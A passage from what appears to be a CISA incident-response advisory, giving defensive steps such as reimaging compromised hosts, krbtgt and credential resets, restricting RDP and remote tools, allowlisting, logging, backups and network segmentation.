 * Ensuring that decommissioning of systems has been completed, or taking appropriate action to remove them from the network, limits their susceptibility and reduces the investigative surface to be analyzed.

##### **Quarantine and Reimage Compromised Hosts**

**Note:** Proceed with caution to avoid the adverse effects detailed in the Common Mistakes in Incident Handling section above.

 * Reimage or remove any compromised systems found on the network.
 * Monitor and educate users to be cautious of any downloads from third-party sites or vendors.
 * Block the known bad domains and add a web content filtering capability to block malicious sites by category to prevent future compromise.
 * Sanitize removable media and investigate network shares accessible by users.
 * Improve existing network-based malware detection tools with sandboxing capabilities.

##### **Disable Unnecessary Ports, Protocols, and Services**

 * Identify and disable ports, protocols, and services not needed for official business to prevent would-be attackers from moving laterally to exploit vulnerabilities. This includes external communications as well as communications between networks.
 * Document allowed ports and protocols at the enterprise level.
 * Restrict inbound and outbound access to ports and protocols not justified for business use.
 * Restrict the allowed access list to assets justified by business use.
 * Enable firewall logging for inbound and outbound network traffic, covering both allowed and denied traffic.

##### **Restrict or Disable Interactive Login for Service Accounts**

Service accounts are privileged accounts dedicated to certain services to perform activities related to the service or application without being tied to a single domain user. Given that service accounts tend to be privileged and thereby have administrative privileges, they are often a target for attackers aiming to obtain credentials. Interactive login to a service account not directly tied to an end-user account makes it difficult to establish accountability during cyber incidents.

 * Audit Active Directory (AD) to identify and document active service accounts.
 * Restrict use of service accounts using AD group policy.
 * Disallow interactive login by adding service accounts to a group of non-interactive login users.
 * Continuously monitor service account activities by enhancing logging.
 * Rotate service account credentials and apply password best practices without service degradation or disruption.

##### **Disable Unnecessary Remote Network Administration Tools**

 * If an attacker (or malware) gains access to a remote user's computer, steals authentication data (login/password), hijacks an active remote administration session, or successfully exploits a vulnerability in the remote administration tool's software, the attacker (or malware) will gain unrestricted control of the enterprise network environment. Attackers can use compromised hosts as a relay server for reverse connections, which could enable them to connect to these remote administration tools from anywhere.
 * Remove all remote administration tools that are not required for day-to-day IT operations.
Closely monitor and log events for each remote-control session required by department IT operations.

##### **Manage Unsecure Remote Desktop Services**

Allowing unrestricted RDP access can increase opportunities for malicious activity such as on-path and Pass-the-Hash (PtH) attacks.

 * Implement secure remote desktop gateway solutions.
 * Restrict RDP service trust across multiple network zones.
 * Implement privileged account monitoring and short-duration password leases for RDP service use.
 * Implement enhanced and continuous monitoring of RDP services by enabling logging and ensuring RDP logins are captured in the logs.

##### **Credential Reset and Access Policy Review**

Credential resets need to be planned strategically to ensure that all compromised accounts and devices are included and to reduce the likelihood that the attacker is able to adapt in response.

 * Force password resets; revoke and issue new certificates for affected accounts/devices.
 * If it is suspected that the attacker has gained access to the Domain Controller, then the passwords for all local accounts—such as Guest, HelpAssistant, DefaultAccount, System, Administrator, and `krbtgt`—should be reset. It is essential that the password for the `krbtgt` account is reset, as this account is responsible for handling Kerberos ticket requests as well as encrypting and signing them. The account should be reset twice (as the account has a two-password history).
 * The first `krbtgt` reset needs to be allowed to replicate to all domain controllers prior to the second reset to avoid any issues.
 * If it is suspected that the `ntds.dit` file has been exfiltrated, then all domain user passwords will need to be reset.
 * Review access policies to temporarily revoke privileges/access for affected accounts/devices. 
If it is necessary not to alert the attacker (e.g., for intelligence purposes), then privileges can instead be reduced for affected accounts/devices to “contain” them.

##### **Patch Vulnerabilities**

Attackers frequently exploit software or hardware vulnerabilities to gain access to a targeted system.

 * Known vulnerabilities in external-facing devices and servers should be patched immediately, starting with the point of compromise, if known.
 * Ensure external-facing devices have not already been compromised while going through the patching process.
 * If the point of compromise (i.e., the specific software, device, or server) is known, but how it was exploited is unknown, notify the vendor so they can begin analysis and develop a new patch.
 * Follow vendor remediation guidance, including the installation of new patches as soon as they become available.

#### **General Recommendations and Best Practices Prior to an Incident**

Properly implemented defensive techniques and programs make it more difficult for a threat actor to gain access to a network and remain persistent yet undetected. When an effective defensive program is in place, attackers should encounter complex defensive barriers. Attacker activity should also trigger detection and prevention mechanisms that enable organizations to identify, contain, and respond to the intrusion quickly. There is no single technique, program, or set of defensive techniques or programs that will completely prevent all attacks. The network administrator should adopt and implement multiple defensive techniques and programs in a layered approach to provide a complex barrier to entry, increase the likelihood of detection, and decrease the likelihood of a successful attack. This layered mitigation approach is known as defense-in-depth.

##### **User Education**

End users are the front line of an organization’s security. 
Educating them in security principles, as well as the actions to take and not take during an incident, will increase the organization’s resilience and might prevent easily avoidable compromises.

 * Educate users to be cautious of any downloads from third-party sites or vendors.
 * Train users to recognize phishing emails. There are several systems and services (free and otherwise) that can be deployed or leveraged for this.
 * Train users on which groups/individuals to contact when they suspect an incident.
 * Train users on the actions they can and cannot take if they suspect an incident, and why (some users will attempt to remediate and might make things worse).

##### **Allowlisting**

 * Enable application directory allowlisting through Microsoft Software Restriction Policy or AppLocker.
 * Use directory allowlisting rather than attempting to list every possible permutation of applications in a network environment. Safe defaults allow applications to run from `PROGRAMFILES`, `PROGRAMFILES(X86)`, and `SYSTEM32`. Disallow all other locations unless an exception is granted.
 * Prevent the execution of unauthorized software by using application allowlisting as part of the OS installation and security hardening process.

##### **Account Control**

 * Decrease a threat actor’s ability to access key network resources by implementing the principle of least privilege.
 * Limit the ability of a local administrator account to log in from a local interactive session (e.g., “Deny access to this computer from the network”) and prevent access via an RDP session.
 * Remove unnecessary accounts and groups; restrict root access.
 * Control and limit local administration; e.g., 
implementing Just Enough Administration (JEA) or just-in-time (JIT) administration, or enforcing PowerShell Constrained Language mode via a User Mode Code Integrity (UMCI) policy.
 * Make use of the Protected Users Active Directory group in Windows domains to further secure privileged user accounts against pass-the-hash attacks.

##### **Backups**

 * Identify what data is essential to keeping operations running; make regular backup copies.
 * Test that backups are working to ensure they can restore the data in the event of an incident.
 * Create offline backups to help recover from a ransomware attack or from disasters (fire, flooding, etc.).
 * Securely store offline backups at an offsite location. If feasible, choose an offsite location far enough from the primary location that it would be unaffected by a regional natural disaster.

##### **Workstation Management**

 * Create and deploy a secure system baseline image to all workstations.
 * Mitigate potential exploitation by threat actors by following a normal patching cycle for all OSs, applications, and software, with exceptions for emergency patches.
 * Apply asset and patch management processes.
 * Reduce the number of cached credentials to one (if a laptop) or zero (if a desktop or fixed asset).

##### **Host-Based Intrusion Detection / Endpoint Detection and Response**

 * Configure and monitor workstation system logs through a host-based endpoint detection and response platform and firewall.
 * Deploy an anti-malware solution on workstations to prevent spyware, adware, and malware as part of the OS security baseline.
 * Ensure that your anti-malware solution remains up to date.
 * Monitor antivirus scan results on a regular basis.

##### **Server Management**

 * Create a secure system baseline image and deploy it to all servers.
 * Upgrade or decommission end-of-life non-Windows servers.
 * Upgrade or decommission servers running Windows Server 2003 or older versions.
 * Implement asset and patch management processes.
 * Audit for and disable unnecessary services.

##### **Server Configuration and Logging**

 * Establish remote server logging and retention.
 * Reduce the number of cached credentials to zero.
 * Configure and monitor system logs via a centralized security information and event management (SIEM) appliance.
 * Add an explicit `DENY` for `%USERPROFILE%`.
 * Restrict egress web traffic from servers.
 * In Windows environments, use Restricted Admin mode or Remote Credential Guard to further secure remote desktop sessions against pass-the-hash attacks.
 * Restrict anonymous shares.
 * Limit remote access by only using jump servers for such access.
 * On Linux, use SELinux or AppArmor in enforcing mode and/or turn on audit logging.
 * Turn on bash shell logging; ship this and all other logs to a remote server.
 * Do not allow users to use `su`. Use `sudo -l` instead.
 * Configure automatic updates in yum or apt.
 * Mount `/var/tmp` and `/tmp` as `noexec`.

##### **Change Control**

 * Create a change control process for all implemented changes.

##### **Network Security**

 * Implement an intrusion detection system (IDS).
 * Apply continuous monitoring.
 * Send alerts to a SIEM tool.
 * Monitor internal activity (this tool may use the same tap points as the netflow generation tools).
 * Employ netflow capture. 
   * Set a minimum retention period of 180 days.
   * Capture netflow on all ingress and egress points of network segments, not just at the Managed Trusted Internet Protocol Services or Trusted Internet Connections locations.
 * Capture all network traffic.
   * Retain captured traffic for a minimum of 24 hours.
   * Capture traffic on all ingress and egress points of the network.
 * Use VPNs.
   * Maintain site-to-site VPNs with customers and vendors.
   * Authenticate users utilizing site-to-site VPNs.
   * Use authentication, authorization, and accounting (AAA) for controlling network access.
   * Require smartcard authentication to an HTTPS page in order to control access. Authentication should also require explicit rostering of permitted smartcard distinguished names to enhance the security posture on both networks participating in the site-to-site VPN.
   * Establish an appropriate secure tunneling protocol and encryption.
 * Strengthen router configuration (e.g., avoid enabling remote management over the internet and using default IP ranges, automatically log out after configuring routers, and use encryption).
 * Turn off Wi-Fi Protected Setup, enforce the use of strong passwords, and keep router firmware up to date.
 * Improve firewall security (e.g., enable automatic updates, revise firewall rules as appropriate, implement allowlists, establish packet filtering, enforce the use of strong passwords, encrypt networks).
 * Whenever possible, ensure access to network devices via external or untrusted networks (specifically the internet) is disabled.
 * Manage access to the internet (e.g., provide internet access only from devices/accounts that need it, proxy all connections, disable internet access for privileged/administrator accounts, and enable policies that restrict internet access using a blocklist, a resource allowlist, content type, etc.).
 * Conduct regular vulnerability scans of the internal and external networks and hosted content to identify and mitigate vulnerabilities.
 * Define areas within the network that should be segmented to increase visibility of lateral movement by a threat actor and to strengthen the defense-in-depth posture.
 * Develop a process to block traffic to IP addresses and domain names that have been identified as being used to aid previous attacks.
 * Evaluate and consider the security configurations of Microsoft Office 365 (O365) and other cloud collaboration service platforms prior to deployment.
   * Use multi-factor authentication. This is the best mitigation technique to protect against credential theft for O365 administrators and users.
   * Protect Global Admins from compromise and use the principle of “least privilege.”
   * Enable unified audit logging in the Security and Compliance Center.
   * Enable alerting capabilities.
   * Integrate with organizational SIEM solutions.
   * Disable legacy email protocols, if not required, or limit their use to specific users.

##### **Network Infrastructure Recommendations**

 * Create a secure system baseline image and deploy it to all networking equipment (e.g., switches, routers, firewalls).
 * Remove unnecessary OS files from the Internetwork Operating System (IOS). 
This will limit the possible targets of persistence (i.e., files in which to embed malicious code) if the device is compromised and will align with National Security Agency Network Device Integrity best practices.
 * Remove vulnerable IOS OS files (i.e., older iterations) from the device’s boot variable (see `show boot` or `show bootvar`).
 * Update to the latest available operating system for IOS devices.
 * On devices with a Secure Sockets Layer (SSL) VPN enabled, routinely verify customized web objects against the organization’s known-good files for such VPNs to ensure the devices remain free of unauthorized modification.
 * Ensure that any incident response tools that point to external domains are either removed or updated to point to internal security tools. If this is not done and an external domain to which a tool points expires, a malicious threat actor may register it and start collecting telemetry from the infrastructure.

##### **Host Recommendations**

 * Implement policies to block workstation-to-workstation RDP connections through a Group Policy Object on Windows, or by a similar mechanism.
 * Store system logs of mission-critical systems for at least one year within a SIEM tool.
 * Review the configuration of application logs to verify that the recorded fields will contribute to an incident response investigation.

##### **User Management**

 * Reduce the number of domain and enterprise administrator accounts.
 * Create non-privileged accounts for privileged users and ensure they use the non-privileged accounts for all non-privileged access (e.g., web browsing, email access).
 * If possible, use technical methods to detect or prevent browsing by privileged accounts (authentication to web proxies would enable blocking of Domain Administrators).
 * Use two-factor authentication (e.g., security tokens for remote access and access to any sensitive data repositories).
 * If soft tokens are used, they should not exist on the same device that is 
requesting remote access (e.g., a laptop) and instead should be on a smartphone, token, or other out-of-band device.
 * Create privileged role tracking.
 * Create a change control process for all privilege escalations and role changes on user accounts.
 * Enable alerts on privilege escalations and role changes.
 * Log privileged user changes in the network environment and create an alert for unusual events.
 * Establish least privilege controls.
 * Implement a security-awareness training program.

##### **Segregate Networks and Functions**

Proper network segmentation is a very effective security mechanism to prevent an intruder from propagating exploits or moving laterally around an internal network. On a poorly segmented network, intruders are able to extend their impact to control critical devices or gain access to sensitive data and intellectual property. Security architects must consider the overall infrastructure layout, segmentation, and segregation. Segregation separates network segments based on role and functionality. A securely segregated network can contain malicious occurrences, reducing the impact from intruders in the event that they have gained a foothold somewhere inside the network.

###### **Physical Separation of Sensitive Information**

Local Area Network (LAN) segments are separated by traditional network devices such as routers. Routers are placed between networks to create boundaries, increase the number of broadcast domains, and effectively filter users’ broadcast traffic. 
These boundaries can be used to contain security breaches by restricting traffic to separate segments, and segments of the network can even be shut down during an intrusion, restricting adversary access.

Recommendations:

 * Implement the principles of least privilege and need-to-know when designing network segments.
 * Separate sensitive information and security requirements into network segments.
 * Apply security recommendations and secure configurations to all network segments and network layers.

###### **Virtual Separation of Sensitive Information**

As technologies change, new strategies are developed to improve IT efficiencies and network security controls. Virtual separation is the logical isolation of networks on the same physical network. The same physical segmentation design principles apply to virtual segmentation, but no additional hardware is required. Existing technologies can be used to prevent an intruder from breaching other internal network segments.

Recommendations:

 * Use Private Virtual LANs (PVLANs) to isolate a user from the rest of the broadcast domains.
 * Use Virtual Routing and Forwarding (VRF) technology to segment network traffic over multiple routing tables simultaneously on a single router.
 * Use VPNs to securely extend a host/network by tunneling through public or private networks.

#### **Additional Best Practices**

 * Implement a vulnerability assessment and remediation program.
 * Encrypt all sensitive data in transit and at rest.
 * Create an insider threat program.
 * Assign additional personnel to review logging and alerting data.
 * Complete independent security (not compliance) audits.
 * Create an information sharing program.
 * Complete and maintain network and system documentation to aid in timely incident response, including:
   * Network diagrams,
   * Asset owners,
   * Type of asset, and
   * An up-to-date incident response plan.

### Resources

 * [CISA Insights](<https://www.cisa.gov/insights>)
 * 
[CISA Alert: